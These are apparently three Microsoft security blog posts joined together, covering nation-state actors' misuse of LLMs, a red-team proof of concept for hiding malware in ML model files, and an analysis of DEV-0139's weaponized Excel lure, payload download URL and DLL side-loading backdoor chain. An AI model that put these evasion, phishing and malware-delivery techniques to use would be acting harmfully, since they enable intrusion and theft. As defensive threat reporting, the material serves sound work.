The objective of Microsoft’s partnership with OpenAI, including the release of this research, is to ensure the safe and responsible use of AI technologies like ChatGPT, upholding the highest standards of ethical application to protect the community from potential misuse. As part of this commitment, we have taken measures to disrupt assets and accounts associated with threat actors, improve the protection of OpenAI LLM technology and users from attack or abuse, and shape the guardrails and safety mechanisms around our models. In addition, we are also deeply committed to using generative AI to disrupt threat actors and leverage the power of new tools, including Microsoft Copilot for Security, to elevate defenders everywhere.

A principled approach to detecting and blocking threat actors

The progress of technology creates a demand for strong cybersecurity and safety measures. For example, the White House’s Executive Order on AI requires rigorous safety testing and government supervision for AI systems that have major impacts on national and economic security or public health and safety. Our actions enhancing the safeguards of our AI models and partnering with our ecosystem on the safe creation, implementation, and use of these models align with the Executive Order’s request for comprehensive AI safety and security standards.

In line with Microsoft’s leadership across AI and cybersecurity, today we are announcing principles shaping Microsoft’s policy and actions mitigating the risks associated with the use of our AI tools and APIs by nation-state advanced persistent threats (APTs), advanced persistent manipulators (APMs), and cybercriminal syndicates we track.

These principles include:   

• Identification and action against malicious threat actors’ use: Upon detection of the use of any Microsoft AI application programming interfaces (APIs), services, or systems by an identified malicious threat actor, including nation-state APT or APM, or the cybercrime syndicates we track, Microsoft will take appropriate action to disrupt their activities, such as disabling the accounts used, terminating services, or limiting access to resources.           

• Notification to other AI service providers: When we detect a threat actor’s use of another service provider’s AI, AI APIs, services, and/or systems, Microsoft will promptly notify the service provider and share relevant data. This enables the service provider to independently verify our findings and take action in accordance with their own policies.

• Collaboration with other stakeholders: Microsoft will collaborate with other stakeholders to regularly exchange information about detected threat actors’ use of AI. This collaboration aims to promote collective, consistent, and effective responses to ecosystem-wide risks.

• Transparency: As part of our ongoing efforts to advance responsible use of AI, Microsoft will inform the public and stakeholders about actions taken under these threat actor principles, including the nature and extent of threat actors’ use of AI detected within our systems and the measures taken against them, as appropriate.

Microsoft remains committed to responsible AI innovation, prioritizing the safety and integrity of our technologies with respect for human rights and ethical standards. These principles announced today build on Microsoft’s Responsible AI practices, our voluntary commitments to advance responsible AI innovation and the Azure OpenAI Code of Conduct. We are following these principles as part of our broader commitments to strengthening international law and norms and to advance the goals of the Bletchley Declaration endorsed by 29 countries.

Microsoft and OpenAI’s complementary defenses protect AI platforms

Because Microsoft and OpenAI’s partnership extends to security, the companies can take action when known and emerging threat actors surface. Microsoft Threat Intelligence tracks more than 300 unique threat actors, including 160 nation-state actors, 50 ransomware groups, and many others. These adversaries employ various digital identities and attack infrastructures. Microsoft’s experts and automated systems continually analyze and correlate these attributes, uncovering attackers’ efforts to evade detection or expand their capabilities by leveraging new technologies. Consistent with preventing threat actors’ actions across our technologies and working closely with partners, Microsoft continues to study threat actors’ use of AI and LLMs, partner with OpenAI to monitor attack activity, and apply what we learn to continually improve defenses. This blog provides an overview of observed activities collected from known threat actor infrastructure as identified by Microsoft Threat Intelligence, then shared with OpenAI to identify potential malicious use or abuse of their platform and protect our mutual customers from future threats or harm.

Recognizing the rapid growth of AI and emergent use of LLMs in cyber operations, we continue to work with MITRE to integrate these LLM-themed tactics, techniques, and procedures (TTPs) into the MITRE ATT&CK® framework or MITRE ATLAS™ (Adversarial Threat Landscape for Artificial-Intelligence Systems) knowledgebase. This strategic expansion reflects a commitment to not only track and neutralize threats, but also to pioneer the development of countermeasures in the evolving landscape of AI-powered cyber operations. A full list of the LLM-themed TTPs, which include those we identified during our investigations, is summarized in the appendix.

Summary of Microsoft and OpenAI’s findings and threat intelligence

The threat ecosystem over the last several years has revealed a consistent theme of threat actors following trends in technology in parallel with their defender counterparts. Threat actors, like defenders, are looking at AI, including LLMs, to enhance their productivity and take advantage of accessible platforms that could advance their objectives and attack techniques. Cybercrime groups, nation-state threat actors, and other adversaries are exploring and testing different AI technologies as they emerge, in an attempt to understand potential value to their operations and the security controls they may need to circumvent. On the defender side, hardening these same security controls from attacks and implementing equally sophisticated monitoring that anticipates and blocks malicious activity is vital.

While different threat actors’ motives and complexity vary, they have common tasks to perform in the course of targeting and attacks. These include reconnaissance, such as learning about potential victims’ industries, locations, and relationships; help with coding, including improving things like software scripts and malware development; and assistance with learning and using native languages. Language support is a natural feature of LLMs and is attractive for threat actors with continuous focus on social engineering and other techniques relying on false, deceptive communications tailored to their targets’ jobs, professional networks, and other relationships.

Importantly, our research with OpenAI has not identified significant attacks employing the LLMs we monitor closely. At the same time, we feel this is important research to publish to expose early-stage, incremental moves that we observe well-known threat actors attempting, and share information on how we are blocking and countering them with the defender community.

While attackers will remain interested in AI and probe technologies’ current capabilities and security controls, it’s important to keep these risks in context. As always, hygiene practices such as multifactor authentication (MFA) and Zero Trust defenses are essential because attackers may use AI-based tools to improve their existing cyberattacks that rely on social engineering and finding unsecured devices and accounts.

The threat actors profiled below are a sample of observed activity we believe best represents the TTPs the industry will need to better track using MITRE ATT&CK® framework or MITRE ATLAS™ knowledgebase updates.

Forest Blizzard 

Forest Blizzard (STRONTIUM) is a Russian military intelligence actor linked to GRU Unit 26165, who has targeted victims of both tactical and strategic interest to the Russian government. Their activities span across a variety of sectors including defense, transportation/logistics, government, energy, non-governmental organizations (NGO), and information technology. Forest Blizzard has been extremely active in targeting organizations in and related to Russia’s war in Ukraine throughout the duration of the conflict, and Microsoft assesses that Forest Blizzard operations play a significant supporting role to Russia’s foreign policy and military objectives both in Ukraine and in the broader international community. Forest Blizzard overlaps with the threat actor tracked by other researchers as APT28 and Fancy Bear.

Forest Blizzard’s use of LLMs has involved research into various satellite and radar technologies that may pertain to conventional military operations in Ukraine, as well as generic research aimed at supporting their cyber operations. Based on these observations, we map and classify these TTPs using the following descriptions:

• LLM-informed reconnaissance: Interacting with LLMs to understand satellite communication protocols, radar imaging technologies, and specific technical parameters. These queries suggest an attempt to acquire in-depth knowledge of satellite capabilities.
• LLM-enhanced scripting techniques: Seeking assistance in basic scripting tasks, including file manipulation, data selection, regular expressions, and multiprocessing, to potentially automate or optimize technical operations.

Microsoft observed engagement from Forest Blizzard that were representative of an adversary exploring the use cases of a new technology. All accounts and assets associated with Forest Blizzard have been disabled.

Emerald Sleet

Emerald Sleet (THALLIUM) is a North Korean threat actor that has remained highly active throughout 2023. Their recent operations relied on spear-phishing emails to compromise and gather intelligence from prominent individuals with expertise on North Korea. Microsoft observed Emerald Sleet impersonating reputable academic institutions and NGOs to lure victims into replying with expert insights and commentary about foreign policies related to North Korea. Emerald Sleet overlaps with threat actors tracked by other researchers as Kimsuky and Velvet Chollima.

Emerald Sleet’s use of LLMs has been in support of this activity and involved research into think tanks and experts on North Korea, as well as the generation of content likely to be used in spear-phishing campaigns. Emerald Sleet also interacted with LLMs to understand publicly known vulnerabilities, to troubleshoot technical issues, and for assistance with using various web technologies. Based on these observations, we map and classify these TTPs using the following descriptions:

• LLM-assisted vulnerability research: Interacting with LLMs to better understand publicly reported vulnerabilities, such as the CVE-2022-30190 Microsoft Support Diagnostic Tool (MSDT) vulnerability (known as “Follina”).
• LLM-enhanced scripting techniques: Using LLMs for basic scripting tasks such as programmatically identifying certain user events on a system and seeking assistance with troubleshooting and understanding various web technologies.
• LLM-supported social engineering: Using LLMs for assistance with the drafting and generation of content that would likely be for use in spear-phishing campaigns against individuals with regional expertise.
• LLM-informed reconnaissance: Interacting with LLMs to identify think tanks, government organizations, or experts on North Korea that have a focus on defense issues or North Korea’s nuclear weapon’s program.

All accounts and assets associated with Emerald Sleet have been disabled.

Crimson Sandstorm

Crimson Sandstorm (CURIUM) is an Iranian threat actor assessed to be connected to the Islamic Revolutionary Guard Corps (IRGC). Active since at least 2017, Crimson Sandstorm has targeted multiple sectors, including defense, maritime shipping, transportation, healthcare, and technology. These operations have frequently relied on watering hole attacks and social engineering to deliver custom .NET malware. Prior research also identified custom Crimson Sandstorm malware using email-based command-and-control (C2) channels. Crimson Sandstorm overlaps with the threat actor tracked by other researchers as Tortoiseshell, Imperial Kitten, and Yellow Liderc.

The use of LLMs by Crimson Sandstorm has reflected the broader behaviors that the security community has observed from this threat actor. Interactions have involved requests for support around social engineering, assistance in troubleshooting errors, .NET development, and ways in which an attacker might evade detection when on a compromised machine. Based on these observations, we map and classify these TTPs using the following descriptions:

• LLM-supported social engineering: Interacting with LLMs to generate various phishing emails, including one pretending to come from an international development agency and another attempting to lure prominent feminists to an attacker-built website on feminism. 
• LLM-enhanced scripting techniques: Using LLMs to generate code snippets that appear intended to support app and web development, interactions with remote servers, web scraping, executing tasks when users sign in, and sending information from a system via email.
• LLM-enhanced anomaly detection evasion: Attempting to use LLMs for assistance in developing code to evade detection, to learn how to disable antivirus via registry or Windows policies, and to delete files in a directory after an application has been closed.

All accounts and assets associated with Crimson Sandstorm have been disabled.

Charcoal Typhoon

Charcoal Typhoon (CHROMIUM) is a Chinese state-affiliated threat actor with a broad operational scope. They are known for targeting sectors that include government, higher education, communications infrastructure, oil & gas, and information technology. Their activities have predominantly focused on entities within Taiwan, Thailand, Mongolia, Malaysia, France, and Nepal, with observed interests extending to institutions and individuals globally who oppose China’s policies. Charcoal Typhoon overlaps with the threat actor tracked by other researchers as Aquatic Panda, ControlX, RedHotel, and BRONZE UNIVERSITY.

In recent operations, Charcoal Typhoon has been observed interacting with LLMs in ways that suggest a limited exploration of how LLMs can augment their technical operations. This has consisted of using LLMs to support tooling development, scripting, understanding various commodity cybersecurity tools, and for generating content that could be used to social engineer targets. Based on these observations, we map and classify these TTPs using the following descriptions:

• LLM-informed reconnaissance: Engaging LLMs to research and understand specific technologies, platforms, and vulnerabilities, indicative of preliminary information-gathering stages.
• LLM-enhanced scripting techniques: Utilizing LLMs to generate and refine scripts, potentially to streamline and automate complex cyber tasks and operations.
• LLM-supported social engineering: Leveraging LLMs for assistance with translations and communication, likely to establish connections or manipulate targets.
• LLM-refined operational command techniques: Utilizing LLMs for advanced commands, deeper system access, and control representative of post-compromise behavior.

All associated accounts and assets of Charcoal Typhoon have been disabled, reaffirming our commitment to safeguarding against the misuse of AI technologies.

Salmon Typhoon

Salmon Typhoon (SODIUM) is a sophisticated Chinese state-affiliated threat actor with a history of targeting US defense contractors, government agencies, and entities within the cryptographic technology sector. This threat actor has demonstrated its capabilities through the deployment of malware, such as Win32/Wkysol, to maintain remote access to compromised systems. With over a decade of operations marked by intermittent periods of dormancy and resurgence, Salmon Typhoon has recently shown renewed activity. Salmon Typhoon overlaps with the threat actor tracked by other researchers as APT4 and Maverick Panda.

Notably, Salmon Typhoon’s interactions with LLMs throughout 2023 appear exploratory and suggest that this threat actor is evaluating the effectiveness of LLMs in sourcing information on potentially sensitive topics, high profile individuals, regional geopolitics, US influence, and internal affairs. This tentative engagement with LLMs could reflect both a broadening of their intelligence-gathering toolkit and an experimental phase in assessing the capabilities of emerging technologies.

Based on these observations, we map and classify these TTPs using the following descriptions:

• LLM-informed reconnaissance: Engaging LLMs for queries on a diverse array of subjects, such as global intelligence agencies, domestic concerns, notable individuals, cybersecurity matters, topics of strategic interest, and various threat actors. These interactions mirror the use of a search engine for public domain research.
• LLM-enhanced scripting techniques: Using LLMs to identify and resolve coding errors. Requests for support in developing code with potential malicious intent were observed by Microsoft, and it was noted that the model adhered to established ethical guidelines, declining to provide such assistance.
• LLM-refined operational command techniques: Demonstrating an interest in specific file types and concealment tactics within operating systems, indicative of an effort to refine operational command execution.
• LLM-aided technical translation and explanation: Leveraging LLMs for the translation of computing terms and technical papers.

Salmon Typhoon’s engagement with LLMs aligns with patterns observed by Microsoft, reflecting traditional behaviors in a new technological arena. In response, all accounts and assets associated with Salmon Typhoon have been disabled.

In closing, AI technologies will continue to evolve and be studied by various threat actors. Microsoft will continue to track threat actors and malicious activity misusing LLMs, and work with OpenAI and other partners to share intelligence, improve protections for customers and aid the broader security community.

Appendix: LLM-themed TTPs

Using insights from our analysis above, as well as other potential misuse of AI, we’re sharing the below list of LLM-themed TTPs that we map and classify to the MITRE ATT&CK® framework or MITRE ATLAS™ knowledgebase to equip the community with a common taxonomy to collectively track malicious use of LLMs and create countermeasures against:

• LLM-informed reconnaissance: Employing LLMs to gather actionable intelligence on technologies and potential vulnerabilities.
• LLM-enhanced scripting techniques: Utilizing LLMs to generate or refine scripts that could be used in cyberattacks, or for basic scripting tasks such as programmatically identifying certain user events on a system and assistance with troubleshooting and understanding various web technologies.
• LLM-aided development: Utilizing LLMs in the development lifecycle of tools and programs, including those with malicious intent, such as malware.
• LLM-supported social engineering: Leveraging LLMs for assistance with translations and communication, likely to establish connections or manipulate targets.
• LLM-assisted vulnerability research: Using LLMs to understand and identify potential vulnerabilities in software and systems, which could be targeted for exploitation.
• LLM-optimized payload crafting: Using LLMs to assist in creating and refining payloads for deployment in cyberattacks.
• LLM-enhanced anomaly detection evasion: Leveraging LLMs to develop methods that help malicious activities blend in with normal behavior or traffic to evade detection systems.
• LLM-directed security feature bypass: Using LLMs to find ways to circumvent security features, such as two-factor authentication, CAPTCHA, or other access controls.
• LLM-advised resource development: Using LLMs in tool development, tool modifications, and strategic operational planning.

Learn more

Read the sixth edition of Cyber Signals, spotlighting how we are protecting AI platforms from emerging threats related to nation-state cyberthreat actors: Navigating cyberthreats and strengthening defenses in the era of AI.

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Staying ahead of threat actors in the age of AI appeared first on Microsoft Security Blog.

Brad Smith recently pointed out that 2023 will likely mark the inflection point for AI going mainstream, the same way we think of 1995 for browsing the internet or 2007 for the smartphone revolution. And while Brad outlines some major opportunities for AI across industries, he also calls out the deep responsibility involved for those who develop these technologies. One of the biggest opportunities is also a core responsibility for us at Microsoft – building a more secure digital future. AI has the incredible potential to reshape our security landscape and protect organizations and people in ways we have been unable to do in the past.

With all of AI’s potential to empower people and organizations, it also comes with risks that the security community must address. It is imperative that we as an industry and global technology community get this journey right, and that means looking at AI with diverse perspectives, taking it slowly, working with our partners across government and industry – and sharing what we’re learning.

At Microsoft, we’ve been working on the challenges and opportunities of AI for years. Today we’re sharing some recent developments so that the community can be better informed and better equipped for a new world of AI exploration:

• New research: A dedicated AI Security Red Team within Microsoft Threat Intelligence explored how traditional software threats affect AI and how security professionals, developers, and machine learning engineers should think about securing and monitoring AI and machine learning models. This team will continue to research and test security in AI and machine learning as we learn more as a company and as an industry.

• New tools for defenders: Microsoft recently released an open-source automation tool for security testing of AI systems called Counterfit. The tool is designed to help organizations conduct AI security risk assessments and help ensure that the algorithms used in their businesses are robust, reliable, and trustworthy. As of today, our Counterfit tool will now be part of MITRE’s new Arsenal plug-in.

• Industry collaboration to help secure the AI supply chain: We worked with Hugging Face, one of the most popular machine learning model repositories, to mitigate threats to AI and machine learning frameworks by collaborating on an AI-specific security scanner. This tool will help the security community to better secure their software supply chain when it comes to AI and machine learning.

AI brings new capabilities – and familiar risks

AI and machine learning can provide remarkable efficiency gains for organizations and lift the burden from a work force overwhelmed by data.

As an example, these capabilities can be particularly helpful in cybersecurity. There are more than 1,200 brute-force password attacks per second, and according to McKinsey, many organizations have more than 100 security tools in place, each with its own portal and alerting system to be checked daily. AI will change the way we defend against threats by improving our ability to protect and respond at the speed of an attack.

This is why AI is popular right now across industries: it provides a way to solve sophisticated problems utilizing complex data relationships merely by human labeling of input and output examples. It uses the inherent advantages of computing to lift the burden of massive data and speed our path to insights and discoveries.

But with its capabilities, AI also brings some risks that organizations may not be considering. Many businesses are pulling existing models from public AI and machine learning repositories as they work to apply AI models to their own operations. But often, either the software used to build AI systems or the AI models housed in the repositories have not been moderated. This creates the risk that anyone can put up a tampered model for consumption, which can poison any system that uses the model.

There is a misconception in the security community that attacking AI and machine learning systems involves exotic algorithms and advanced knowledge of machine learning. But while machine learning may seem like math and magic, at the core it runs on bits and bytes, and like all software, it can be vulnerable to security issues.

Within the Microsoft Threat Intelligence team, we have a group that focuses on understanding these risks. The AI Security Red Team is an interdisciplinary group of security researchers, machine learning engineers, and software engineers whose goal is to proactively identify failure points in AI systems and help remediate them. The AI Security Red Team works to see how attackers approach AI and how they might be able to compromise an AI or machine learning model, so we can understand those attacks and how to get ahead of them.

The research: Old threats take on new life with AI

Recently the AI Security Red Team investigated how easy it would be for an attacker to inject malicious code into AI and machine learning model repositories. Their central question was, how can an adversary with current-day, traditional hacking skills cause harm to AI systems? This question led us to prove that traditional software attack vectors can indeed be a threat.

The security community has long known about Python serialization threats, but not in the context of AI systems. Academic researchers have warned about the lack of security practices in machine learning software. Recently, there has been a wave of research (for example, here, here, and here) looking at serialization threats specifically in the context of machine learning. MITRE ATLAS, the ATT&CK-style framework for adversarial machine learning, specifically calls out machine learning supply chain compromise. Even AI frameworks’ security documentation explicitly points out that machine learning model files are designed to store generic programs.

What has been less clear is how far attackers could take this, which is what the Microsoft AI Security Red Team explored. The AI Security Red Team routinely emulates a range of adversaries, from script kiddies to advanced attackers, to understand attack vectors against AI and machine systems. To answer our question, we assumed the role of an adversary whose goal is to compromise machine learning systems using only traditional hacking tools and methodology. In other words, our adversary knew nothing about specifically hacking AI.

Our exercise allowed us to assess the impact of poor encryption in machine learning endpoints, improperly configured machine learning workspaces and environments, and overly broad permissions in the storage accounts containing the machine learning model and training data – all of which can be thought of as traditional software threats.

The team found that these traditional software threats can be particularly impactful in the context of AI systems. We looked at two of the AI frameworks most widely used by machine learning engineers and data scientists. These frameworks provide a convenient way to write mathematical expressions to transform data into the required format before running it through an algorithm. The team was able to repurpose one such function, Keras Lambda layer, to inject arbitrary code.

The security community is aware of how Python’s pickle module, which is used for serialization and deserialization of a python object, can be abused by adversaries. Our work, however, shows that machine learning model file formats, which may not use pickle format, are still flexible enough to store generic programs and can be abused. This also reduces the number of steps the adversary needs to include a backdoor in a model released to the internet or a popular repository. 

In our proof of concept, we were able to repurpose the mathematical expression processing function to load malware. An added advantage to the adversary: the attack is self-contained and stealthy; it does not require loading extra custom code prior to loading the model itself.

New tools with Counterfit, CALDERA, and ATLAS

In security, we are constantly investing and innovating to learn about attacker behaviors and bring that human-led intelligence to our products. Our mission is to combine the diversity of thinking and experience from our threat hunters and companies we’ve integrated with (like RiskIQ and CyberX), so our customers can benefit from both hyper-scale threat intelligence as well as AI.

With our announcement today that Microsoft Counterfit is now integrated into MITRE CALDERA, security professionals can now build threat profiles to probe how an adversary can attack AI systems both via traditional methods as well as through novel machine learning techniques.

This new tool integration brings together Microsoft Counterfit, MITRE CALDERA (the de facto tool for adversary emulation), and MITRE ATLAS to help security practitioners better understand threats to ML systems. This will enable security teams to proactively look for weaknesses in AI and machine learning models and fix them before an attacker can take advantage. Now security professionals can get a holistic and automated security assessment of their AI systems using a tool that they are already familiar with.

“With the rise in real world attacks on machine learning systems that we’ve seen through the MITRE ATLAS collaboration, it’s more important than ever to create actionable tools for security professionals to prepare for these growing threats across the globe. We are thrilled to release a new adversary emulation tool, Arsenal, in partnership with Microsoft and their Counterfit team. These open-sourced tools will enhance the ability of security professionals and ML engineers across the community to test the vulnerability of their ML models through the MITRE CALDERA tools they already know and love.”

Doug Robbins, VP Engineering & Prototyping, MITRE

Investment and innovation with partners

In theory, once a machine learning model is embedded with malware, it can be posted in popular ML hosting repositories for anyone to download. An unsuspecting ML engineer could then download the backdoored ML model, which could lead to the adversary gaining foothold into the organization environment.

To help prevent this, we worked with Hugging Face, one of the most popular ML model repositories, to mitigate such threats by collaborating on an AI-specific security scanner.

We also recommend Software Bill of Materials (SBOM) for AI systems. We have amended the package URL (purl) specification to include Hugging Face, as well as MLFlow. Software Package Data Exchange (SPDX) and CycloneDX, the leading SBOM standards which leverage purl spec, allow tracking of ML models. Now any Azure ML, Databricks, or Hugging Face user leveraging Microsoft’s recommended SBOM will have the option to track ML models as part of supply chain security. 

Threat Intelligence in this space will continue to be a team sport, which is why we have partnered with MITRE and 11 other organizations to empower security professionals to track these novel forms of attack via the MITRE ATLAS initiative.

Given we distribute hundreds of millions of ML models every month, corrupted artifacts can cause great harm as well as damage the trust in the open-source community. This is why we at Hugging Face actively develop tools to empower users of our platform to secure their artefacts, and greatly appreciate Microsoft’s community contributions in advancing the security of ML models.

Luc Georges, ML Engineer, Hugging Face

It’s imperative that we as an industry and global technology community are thoughtful and diligent in our approach to securing AI and machine learning systems. At Microsoft, this is core to our focus on AI and our security culture. Because of the nature of emerging technology, in that it’s exactly that – emerging – there are many unknowns. In security, we are constantly investing and innovating to learn about attacker behaviors and bring that human-led intelligence to our products.

The reason we invest in research, tools and industry partnerships like those we’re announcing today is so we can understand the nature of what those attacks would entail, do our best to get ahead of them, and help others in the security community do the same. There is still so much to learn about AI, and we are continuously investing across our platforms and in red-team like research to learn about this technology and to help inform how it will be integrated into our platform and products.

Recommendations and resources

The following recommendations for security professionals can help minimize the risks for AI and ML systems:

1. Encourage ML engineers to inventory, track and update ML models by leveraging model registries. This will help with keeping track of the models in an organization and their software dependencies.
2. Apply existing security best practices to AI systems. This includes sandboxing the environment running ML models via containers and machine virtualization, network monitoring, and firewalls. We have outlined guidance here to get started. By doing this, we treat AI assets as yet another crown jewel that security teams should protect from adversaries.
3. Leverage MITRE ATLAS to understand threats to AI systems, and emulate them using Microsoft Counterfit via MITRE CALDERA. This will help security analysts ground their effort in a realistic, numbers-driven approach to protecting AI systems.

This proof of concept that we pursued is part of broader investment at Microsoft to empower the wide range of stakeholders who play an important role to securely develop and deploy AI systems:

• For security analysts to orient themselves with threats against AI systems, Microsoft, in collaboration with MITRE, released an ATT&CK-style framework Adversarial ML Threat Matrix, complete with case studies of attacks on production machine learning systems, which has evolved into MITRE ATLAS.
• For security professionals, Microsoft open-sourced Counterfit to help with assessing the posture of AI systems.
• For security incident responders, we released a bug bar to systematically triage attacks on ML systems.
• For ML engineers, we released a checklist to complete AI risk assessment.
• For developers, we released threat modeling guidance specifically for ML systems.
• For engineers and policymakers, Microsoft, in collaboration with Berkman Klein Center at Harvard University, released a taxonomy documenting various machine learning failure modes.
• For the broader security community, Microsoft hosted the annual Machine Learning Evasion Competition.
• For Azure machine learning customers, we provided guidance on enterprise security and governance.

Contributors: Ram Shankar Siva Kumar with Gary Lopez Munoz, Matthieu Maitre, Amanda Minnich, Shiven Chawla, Raja Sekhar Rao Dheekonda, Lu Zhang, Charlotte Siska, Sudipto Rakshit.

The post New research, tooling, and partnerships for more secure AI and machine learning appeared first on Microsoft Security Blog.

April 2023 update – Microsoft Threat Intelligence has shifted to a new threat actor naming taxonomy aligned around the theme of weather. DEV-0139 is now tracked as Citrine Sleet.

To learn about how the new taxonomy represents the origin, unique traits, and impact of threat actors, and to get a complete mapping of threat actor names, read this blog: Microsoft shifts to a new threat actor naming taxonomy.

Over the past several years, the cryptocurrency market has considerably expanded, gaining the interest of investors and threat actors. Cryptocurrency itself has been used by cybercriminals for their operations, notably for ransom payment in ransomware attacks, but we have also observed threat actors directly targeting organizations within the cryptocurrency industry for financial gain. Attacks targeting this market have taken many forms, including fraud, vulnerability exploitation, fake applications, and usage of info stealers, as attackers attempt to get their hands on cryptocurrency funds.

We are also seeing more complex attacks wherein the threat actor shows great knowledge and preparation, taking steps to gain their target’s trust before deploying payloads. For example, Microsoft recently investigated an attack where the threat actor, tracked as DEV-0139, took advantage of Telegram chat groups to target cryptocurrency investment companies. DEV-0139 joined Telegram groups used to facilitate communication between VIP clients and cryptocurrency exchange platforms and identified their target from among the members. The threat actor posed as representatives of another cryptocurrency investment company, and in October 2022 invited the target to a different chat group and pretended to ask for feedback on the fee structure used by cryptocurrency exchange platforms. The threat actor had a broader knowledge of this specific part of the industry, indicating that they were well prepared and aware of the current challenge the targeted companies may have.

After gaining the target’s trust, DEV-0139 then sent a weaponized Excel file with the name OKX Binance & Huobi VIP fee comparision.xls which contained several tables about fee structures among cryptocurrency exchange companies. The data in the document was likely accurate to increase their credibility. This weaponized Excel file initiates the following series of activities:

1. A malicious macro in the weaponized Excel file abuses UserForm of VBA to obfuscate the code and retrieve some data.
2. The malicious macro drops another Excel sheet embedded in the form and executes it in invisible mode. The said Excel sheet is encoded in base64, and dropped into C:\ProgramData\Microsoft Media\ with the name VSDB688.tmp
3. The file VSDB688.tmp downloads a PNG file containing three executables: a legitimate Windows file named logagent.exe, a malicious version of the DLL wsock32.dll, and an XOR encoded backdoor.
4. The file logagent.exe is used to sideload the malicious wsock32.dll, which acts as a DLL proxy to the legitimate wsock32.dll. The malicious DLL file is used to load and decrypt the XOR encoded backdoor that lets the threat actor remotely access the infected system.

Further investigation through our telemetry led to the discovery of another file that uses the same DLL proxying technique. But instead of a malicious Excel file, it is delivered in an MSI package for a CryptoDashboardV2 application, dated June 2022. This may suggest other related campaigns are also run by the same threat actor, using the same techniques.

In this blog post, we will present the details uncovered from our investigation of the attack against a cryptocurrency investment company, as well as analysis of related files, to help similar organizations understand this kind of threat, and prepare for possible attacks. Researchers at Volexity recently published their findings on this attack as well.

As with any observed nation state actor activity, Microsoft directly notifies customers that have been targeted or compromised, providing them with the information they need to secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing Microsoft Threat Intelligence Center (MSTIC) to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, a DEV is converted to a named actor.

Initial compromise

To identify the targets, the threat actor sought out members of cryptocurrency investment groups on Telegram. In the specific attack, DEV-0139 got in touch with their target on October 19, 2022 by creating a secondary Telegram group with the name <NameOfTheTargetedCompany> <> OKX Fee Adjustment and inviting three employees. The threat actor created fake profiles using details from employees of the company OKX. The screenshot below shows the real accounts and the malicious ones for two of the users present in the group.

It’s worth noting that the threat actor appears to have a broad knowledge of the cryptocurrency industry and the challenges the targeted company may face. The threat actor asked questions about fee structures, which are the fees used by crypto exchange platforms for trading. The fees are a big challenge for investment funds as they represent a cost and must be optimized to minimize impact on margin and profits. Like many other companies in this industry, the largest costs come from fees charged by exchanges. This is a very specific topic that demonstrates how the threat actor was advanced and well prepared before contacting their target.

After gaining the trust of the target, the threat actor sent a weaponized Excel document to the target containing further details on the fees to appear legitimate. The threat actor used the fee structure discussion as an opportunity to ask the target to open the weaponized Excel file and fill in their information.

Weaponized Excel file analysis

The weaponized Excel file, which has the file name OKX Binance & Huobi VIP fee comparision.xls (Sha256: abca3253c003af67113f83df2242a7078d5224870b619489015e4fde060acad0), is well crafted and contains legitimate information about the current fees used by some crypto exchanges. The metadata extracted showed that the file was created by the user Wolf:

The macro is obfuscated and abuses UserForm (a feature used to create windows) to store data and variables. In this case, the name of the UserForm is IFUZYDTTOP, and the macro retrieves the information with the following code IFUZYDTTOP.MgQnQVGb.Caption where MgQnQVGb is the name of the label in the UserForm and .caption allows to retrieve the information stored into the UserForm.

The table below shows the data retrieved from the UserForm:

The macro retrieves some parameters from the UserForm as well as another XLS file stored in base64. The XLS file is dropped into the directory C:\ProgramData\Microsoft Media as VSDB688.tmp and runs in invisible mode.

Additionally, the main sheet in the Excel file is protected with the password dragon to encourage the target to enable the macros. The sheet is then unprotected after installing and running the other Excel file stored in Base64. This is likely used to trick the user to enable macros and not raise suspicion.

Extracted worksheet

The second Excel file, VSDB688.tmp (Sha256: a2d3c41e6812044573a939a51a22d659ec32aea00c26c1a2fdf7466f5c7e1ee9), is used to retrieve a PNG file that is parsed later by the macro to extract two executable files and the encrypted backdoor. Below is the metadata for the second worksheet:

The table below shows the deobfuscated data retrieved from the UserForm:

The macro retrieves some parameters from the UserForm then downloads a PNG file from hxxps://od.lk/d/d021d412be456a6f78a0052a1f0e3557dcfa14bf25f9d0f1d0d2d7dcdac86c73/Background.png. The file was no longer available at the time of analysis, indicating that the threat actor likely deployed it only for this specific attack.

The PNG is then split into three parts and written in three different files: the legitimate file logagent.exe, a malicious version of wsock32.dll, and the XOR encrypted backdoor with the GUID (56762eb9-411c-4842-9530-9922c46ba2da). The three files are used to load the main payload to the target system.

Loader analysis

Two of the three files extracted from the PNG file, logagent.exe and wsock32.dll, are used to load the XOR encrypted backdoor. The following sections present our in-depth analysis of both files.

Logagent.exe

Logagent.exe (Hash: 8400f2674892cdfff27b0dfe98a2a77673ce5e76b06438ac6110f0d768459942) is a legitimate system application used to log errors from Windows Media Player and send the information for troubleshooting.

The file contains the following metadata, but it is not signed:

The logagent.exe imports function from the wsock32.dll which is abused by the threat actor to load malicious code into the targeted system. To trigger and run the malicious wsock32.dll, logagent.exe is run with the following arguments previously retrieved by the macro: 56762eb9-411c-4842-9530-9922c46ba2da /shadow. Both arguments are then retrieved by wsock32.dll. The GUID 56762eb9-411c-4842-9530-9922c46ba2da is the filename for the malicious wsock32.dll to load and /shadow is used as an XOR key to decrypt it. Both parameters are needed for the malware to function, potentially hindering isolated analysis.

Wsock32.dll

The legitimate wsock32.dll is the Windows Socket API used by applications to handle network connections. In this attack, the threat actor used a malicious version of wsock32.dll to evade detection. The malicious wsock32.dll is loaded by logagent.exe through DLL side-loading and uses DLL proxying to call the legitimate functions from the real wsock32.dll and avoid detection. DLL proxying is a hijacking technique where a malicious DLL sits in between the application calling the exported function and a legitimate DLL that implements that exported function. In this attack, the malicious wsock32.dll acts as a proxy between logagent.exe and the legitimate wsock32.dll.

It is possible to notice that the DLL is forwarding the call to the legitimate functions by looking at the import address table:

When the malicious wsock32.dll is loaded, it first retrieves the command line, and checks if the file with the GUID as a filename is present in the same directory using the CreateFile API to retrieve a file handle.

The malicious wsock32.dll loads and decodes the final implant into the memory with the GUID name which is used to remote access the infected machine.

